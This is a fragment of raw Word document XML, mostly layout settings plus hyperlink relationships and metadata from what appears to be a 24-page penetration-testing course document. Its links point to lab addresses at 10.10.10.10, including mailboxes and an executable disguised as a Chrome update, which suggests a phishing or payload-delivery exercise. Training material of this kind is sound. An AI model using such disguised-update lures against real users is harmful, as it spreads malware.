        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="430781077">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="436802452">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="446391954">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="509413221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="633870619">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="921795728">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="962350198">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="978268902">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1123891222">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1249465896">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1307204444">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1323658101">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1382747297">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1401176623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1426414117">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1454519065">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1472863769">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1481920777">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1493372993">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1542010383">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1548449301">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1565290438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1645311461">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1655986748">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1667316412">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1814713138">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1849327333">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1911769533">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1930655687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1960603974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1964994371">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2005277599">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2045403283">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2062318003">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2143423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ali@10.10.10.10" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.johnbryce.co.il" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:joe@10.10.10.10" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.10:1212/chrome_update.ex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s"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10.10.10.10/multi" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:admin@10.10.10.10"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41CFF0-FA6E-4519-BE82-00ECC62804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1613</TotalTime>
  <Pages>24</Pages>
  <Words>6490</Words>
  <Characters>36997</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>308</Lines>
  <Paragraphs>86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43401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SXC זסב</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SXC זסב</cp:lastModifiedBy>
  <cp:revision>119</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-06T11:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-18T10:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>